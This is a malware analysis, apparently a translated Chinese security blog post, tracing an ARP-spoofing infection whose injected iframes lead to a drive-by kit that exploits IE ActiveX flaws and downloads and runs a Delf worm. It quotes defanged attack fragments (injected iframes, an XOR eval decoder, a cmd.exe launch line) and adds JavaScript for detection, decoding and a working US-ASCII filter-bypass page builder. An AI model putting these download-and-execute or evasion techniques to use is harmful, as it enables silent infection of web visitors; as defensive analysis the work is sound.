ARP virus and web site spreading Worm.Delf.yqz by exploiting the Yahoo! Messenger Webcam Viewer ActiveX Control remote stack overflow vulnerability


Endurer original, version 1

While I was using a web mailbox today, Kaspersky reported:
/---
Detected: malicious program Exploit.HTML.Ascii.o URL: hxxp://mm***.98*7**99***9.com/mm/a.htm
---/

A Google search showed that this code is injected by an ARP virus (malware that ARP-spoofs the local network and inserts an iframe into HTTP pages as they pass through).

Checking confirmed that every web page I opened had the following code appended:
/---
<iframe src="hxxp://mm***.98*7**99***9.com/abc.htm" width="1" height="1" frameborder="0"></iframe>
---/

hxxp://mm***.98**7**99***9.com/abc.htm has the title "mobile phone" and the body text "Service unavailable", a decoy meant to confuse the visitor. It contains:
/---
<iframe src=hxxp://mm***.98*7***99***9.com/mm/a.htm width=100 height=0></iframe>
---/
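The injected frames above are hidden in two different ways (1x1 pixels with quoted attributes, and 100x0 with unquoted attributes), so a detector has to normalise attribute syntax before judging size. As an added example, not code from the original post, the following Node.js script flags hidden iframes of both forms; the sample page and the attacker.example and video.example hostnames are constructed placeholders, not the attacker's real domain.

```javascript
// Added example (not from the original post): flag hidden <iframe> injections of the
// kind an ARP virus appends to every page passing through the LAN.
const IFRAME_RE = /<iframe\b([^>]*)>/gi;
const ATTR_RE = /([a-z-]+)\s*=\s*("([^"]*)"|'([^']*)'|([^\s"'>]+))/gi;

// Parse the attribute list of one tag into a lowercase-keyed object.
// Handles double-quoted, single-quoted and unquoted values.
function parseAttrs(s) {
  const attrs = {};
  let m;
  ATTR_RE.lastIndex = 0;
  while ((m = ATTR_RE.exec(s)) !== null) {
    attrs[m[1].toLowerCase()] = (m[3] ?? m[4] ?? m[5] ?? '').trim();
  }
  return attrs;
}

// An iframe counts as hidden if either dimension is 0 or 1 pixel, or if an inline
// style hides it. frameborder=0 on its own is common on legitimate embeds.
function isHidden(attrs) {
  const dim = v => (v === undefined ? NaN : parseInt(v, 10));
  const w = dim(attrs.width), h = dim(attrs.height);
  if ((!Number.isNaN(w) && w <= 1) || (!Number.isNaN(h) && h <= 1)) return true;
  const style = (attrs.style || '').toLowerCase();
  return /display\s*:\s*none|visibility\s*:\s*hidden/.test(style);
}

// Scan raw HTML and return the hidden iframes with their target URL and size.
function findHiddenIframes(html) {
  const hits = [];
  let m;
  IFRAME_RE.lastIndex = 0;
  while ((m = IFRAME_RE.exec(html)) !== null) {
    const attrs = parseAttrs(m[1]);
    if (isHidden(attrs)) {
      hits.push({ src: attrs.src ?? '', width: attrs.width, height: attrs.height });
    }
  }
  return hits;
}

// Constructed sample page: one legitimate embed followed by the two injected forms
// seen in the post (quoted 1x1 attributes, then unquoted 100x0 attributes).
const SAMPLE = `
<html><body><p>hello</p>
<iframe src="https://video.example/embed/1" width="640" height="360"></iframe>
<IFRAME src="hxxp://attacker.example/abc.htm" width="1" Height="1" frameborder="0"></Iframe>
<IFRAME src=hxxp://attacker.example/mm/a.htm width=100 Height=0></iframe>
</body></html>`;

console.log(JSON.stringify(findHiddenIframes(SAMPLE), null, 1));
```

Run it against a page saved from the browser (or from a capture on the LAN) rather than one fetched again from the server: with ARP spoofing the injection only exists in transit, so the server's copy is clean, which is exactly what makes this class of infection confusing to diagnose.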

hxxp://mm***.98**7**99***9.com/mm/a.htm has the title "Love!" and contains two pieces of malicious code.
The first is a US-ASCII-encoded string.

The second is:
/---
<script language="JavaScript" src="hxxp://mm***.98*7***99***9.com/mm/B.js"></script>
---/

Decoding the string with the US-ASCII decoding program available from http://purpleendurer.ys168.com yields a piece of web code titled "Super ie 0day", whose content is in three parts.

The first part is JavaScript containing two user-defined functions, makeitso() and detectos(). makeitso() calls detectos() to determine the Windows version of the visitor's machine; on Windows XP or another listed Windows version it opens logo.htm instead of banner.htm.

The second part is VBScript. It tries to create a Microsoft.XMLHTTP object; if that fails, it writes out this JavaScript:
/---
<script language="JavaScript">window.setTimeout("makeitso()", 5000);</script>
---/
Otherwise it writes out:
/---
<iframe width="0" height="0" src="apple.htm"></iframe>
---/

The third part is JavaScript. It checks whether a cookie named woshi0day exists; if not, it creates the cookie and writes out:
/---
<iframe width=0 height=0 src=help.htm></iframe>
---/

hxxp://mm***.98**7**99***9.com/mm/B.js is not encoded. It uses the ThunderServer.webThunder.1 control (the Thunder download manager's ActiveX object) to download hxxp://www.98*7**99**9.com/web.exe, save it to C:/ and run it.

File description: D:/Digital Photo/web.exe
Attributes: ---
An error occurred while obtaining the file version information.
Creation time: 13:18:44
Modification time: 13:19:39
Access time: 13:19:52
Size: 18432 bytes, 18.0 KB
MD5: 1c22de0a5753d9e2e9a88d65393d0a9b

Kaspersky reports:
Detected: Trojan program Trojan-Downloader.Win32.Delf.bjy File: D:/test/web.exe/pe_patch.upx/UPX
Rising reports: Worm.Delf.yqz

hxxp://mm***.98**7**99***9.com/mm/logo.htm has the title "Kiss!" and contains two pieces of malicious code.
The first is a US-ASCII-encoded string.

The second is:
/---
<iframe src=hxxp://mm***.98*7***99***9.com/mm/test.htm width=1 height=1 frameborder=0></iframe>
---/

The US-ASCII-encoded string decodes to HTML titled "ieplorer", which contains:
/---
<link rel="stylesheet" href="gnyivsaq.css">
---/

The content of gnyivsaq.css is:
/---
<style type=text/css>
<!--
body {cursor: url('hxxp://www.98*7**99***9.com/yuianlqvzx.jpg')}
-->
</style>
---/

yuianlqvzx.jpg no longer seems to exist on the server. Serving a cursor file under a .jpg name through a CSS cursor: url() rule is the usual delivery for the Windows animated cursor (ANI) vulnerability, so this was presumably an ANI exploit used to download the file.

hxxp://mm***.98**7**99***9.com/mm/test.htm exploits the Yahoo! Messenger Webcam Viewer ActiveX Control remote stack overflow vulnerability, which remote attackers can use to take control of the user's machine.
The Webcam Viewer ActiveX control (ywcvwr.dll) shipped with Yahoo! Messenger does not properly validate the server property. If a user is tricked into visiting a malicious site that assigns an overly long string to this property and then calls the receive() method, a stack overflow is triggered and arbitrary code can be executed.
Reference: hxxp://mcafeefans.com/article.asp?Id=1311

hxxp://mm***.98**7**99***9.com/mm/banner.htm has the title "Bypassing of Web filters by using ASCII exploit by cooldiyer". Its content is the US-ASCII-encoded form of hxxp://mm***.98***7***99***9.com/mm/logo.htm.

hxxp://mm***.98**7**99***9.com/mm/apple.htm contains JavaScript that uses eval() to run code decoded by a custom function, which XORs each numeric value with 109 and converts it back to a character:
/---
var s = function (m) { return String.fromCharCode(m ^ 109); };
---/
Everything passed to eval() is produced by this decoder.

The decoded content is JavaScript that downloads hxxp://www.98*7**99***9.com/web.exe using Microsoft.XMLHTTP, writes it to disk with Scripting.FileSystemObject, and saves it under %WINDIR% with a file name generated by:
/---
function fk(n) {
    var number = Math.random() * n;
    return Math.round(number) + '.exe';
}
---/
That is, a name of the form **.exe where each * is a digit. The file is then moved to the directory %WINDIR%/rising*** and launched through the ShellExecute method of a Shell.Application object q:
/---
q.ShellExecute("%WINDIR%/system32/cmd.exe", "/C %WINDIR%/rising*****/***.exe", "", "open", 0)
---/
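The analyst's counterpart to apple.htm's decoder is to compute the same String.fromCharCode(m ^ 109) transform offline and print the result instead of handing it to eval(). The following is an added example, not code from the malicious page: it encodes a constructed, downloader-shaped script with the page's key, decodes it the way apple.htm does, and additionally recovers the key by brute force for the case where the decoder function has been stripped or altered (the brute force and the example.invalid URL are my additions, not something the page describes).

```javascript
// Added example, not the malware's code. Constructed sample script; the URL is a placeholder.
const SAMPLE_SCRIPT =
  "var x=new ActiveXObject('Microsoft.XMLHTTP');" +
  "x.open('GET','hxxp://example.invalid/web.exe',false);x.send();";

// Encoder (what the kit's generator must have done): XOR each char code with the key.
function xorEncode(text, key) {
  return Array.from(text, ch => ch.charCodeAt(0) ^ key);
}

// Decoder equivalent to apple.htm's s() helper, but returning the string rather than eval()ing it.
function xorDecode(codes, key) {
  return codes.map(m => String.fromCharCode(m ^ key)).join('');
}

// Score a candidate decode: reward printable ASCII, penalise control/high bytes, and
// add a bonus for tokens that are typical of browser droppers of this kind.
function scoreJs(text) {
  let score = 0;
  for (const ch of text) {
    const c = ch.charCodeAt(0);
    score += (c >= 0x20 && c < 0x7f) ? 1 : -5;
  }
  const tokens = ['ActiveXObject', 'XMLHTTP', 'document.write', 'eval(', '.exe',
                  'FileSystemObject', 'Shell.Application', 'ShellExecute'];
  for (const tok of tokens) {
    if (text.includes(tok)) score += 20 * tok.length;
  }
  return score;
}

// Brute-force the single-byte XOR key: try all 256 and keep the best-scoring plaintext.
function recoverXorKey(codes) {
  let best = { key: -1, score: -Infinity, text: '' };
  for (let key = 0; key < 256; key++) {
    const text = xorDecode(codes, key);
    const s = scoreJs(text);
    if (s > best.score) best = { key, score: s, text };
  }
  return best;
}

// Round trip with the page's key, then pretend we did not know it.
const ENCODED = xorEncode(SAMPLE_SCRIPT, 109);
const recovered = recoverXorKey(ENCODED);
console.log('recovered key:', recovered.key);
console.log(recovered.text);
```

In practice you paste the numeric array from the page into ENCODED; the decoded text is then a second stage that usually needs the same treatment, so keep decoding until the result no longer calls eval().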

hxxp://mm***.98**7**99***9.com/mm/help.htm has the title "Bypassing of Web filters by using ASCII exploit by cooldiyer" and consists of a US-ASCII-encoded string.

The decoded content is HTML titled "Bypassing of Web filters by using ASCII exploit by cooldiyer" and "super ie 0day". Its body is JavaScript that exploits the denial of service vulnerability in the Internet Explorer Internet.HHCtrl ActiveX object.
Affected systems:
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
When the URL has not been initialised, calling the Click() method of the Internet.HHCtrl.1 ActiveX object triggers a NULL pointer dereference, which can crash Internet Explorer.
Reference:
Denial of Service Vulnerability in IE Internet.HHCtrl ActiveX Object
http://it.rising.com.cn/Channels/Safety/LatestHole/Hole_Windows/2006-07-25/1153791365d36644.shtml
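The "ASCII exploit by cooldiyer" technique that a.htm, logo.htm, banner.htm and help.htm all rely on works because Internet Explorer, when a page declares charset=us-ascii, simply discards bit 7 of every byte. The attacker sets the high bit on the whole payload, so a signature filter scanning for "<iframe" or "<script" sees only non-ASCII bytes while IE still renders the original markup. The following is an added example, not code from the original post or from the kit: it builds such a page from a constructed payload, shows a naive byte-matching filter missing it, decodes it the way IE did (and the way the decoding program mentioned above must), and shows a filter that normalises the charset first.

```javascript
// Added example modelling the US-ASCII web filter bypass; payload and hosts are constructed.
const META = '<meta http-equiv="Content-Type" content="text/html; charset=us-ascii">';

// Attacker side: set the high bit on every byte of 7-bit markup.
function usAsciiObfuscate(markup) {
  const out = new Uint8Array(markup.length);
  for (let i = 0; i < markup.length; i++) {
    const c = markup.charCodeAt(i);
    if (c > 0x7f) throw new Error('payload must be 7-bit ASCII');
    out[i] = c | 0x80;
  }
  return out;
}

// Build the page the way the bypass pages were laid out: the charset meta tag in
// clear text, followed by the high-bit-set body.
function buildBypassPage(markup) {
  const head = META + '\n';
  const body = usAsciiObfuscate(markup);
  const out = new Uint8Array(head.length + body.length);
  for (let i = 0; i < head.length; i++) out[i] = head.charCodeAt(i);
  out.set(body, head.length);
  return out;
}

// What IE effectively did, and what an analyst's decoder must do: keep 7 bits per byte.
function usAsciiDecode(bytes) {
  let s = '';
  for (const b of bytes) s += String.fromCharCode(b & 0x7f);
  return s;
}

// Latin-1 view of raw bytes, for filters that match on the wire bytes.
function latin1(bytes) {
  return String.fromCharCode(...bytes);
}

const DANGEROUS_TAG = /<(iframe|script|object)/i;

// Naive filter: byte-string search for dangerous tags. Bypassed by the high-bit trick.
function naiveFilterBlocks(bytes) {
  return DANGEROUS_TAG.test(latin1(bytes));
}

// Hardened filter: honour the declared charset the way the browser will, then match.
function declaredCharset(bytes) {
  const m = /charset=([\w-]+)/i.exec(latin1(bytes));
  return m ? m[1].toLowerCase() : '';
}
function hardenedFilterBlocks(bytes) {
  const view = declaredCharset(bytes) === 'us-ascii' ? usAsciiDecode(bytes) : latin1(bytes);
  return DANGEROUS_TAG.test(view);
}

const PAYLOAD = '<html><title>Super ie 0day</title><body>' +
  '<iframe width=0 height=0 src=help.htm></iframe></body></html>';
const PAGE = buildBypassPage(PAYLOAD);

function demo() {
  const decoded = usAsciiDecode(PAGE);
  return {
    naiveBlocked: naiveFilterBlocks(PAGE),       // false: the tags never appear as ASCII bytes
    hardenedBlocked: hardenedFilterBlocks(PAGE), // true: decoded before matching
    roundTrip: decoded === META + '\n' + PAYLOAD,
    decoded,
  };
}
console.log(demo());
```

The practical lesson for detection is the hardened path: any content filter or IDS signature has to apply the same charset normalisation the target browser applies before it looks for tags, otherwise an encoding the browser tolerates is an encoding the filter cannot see through.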
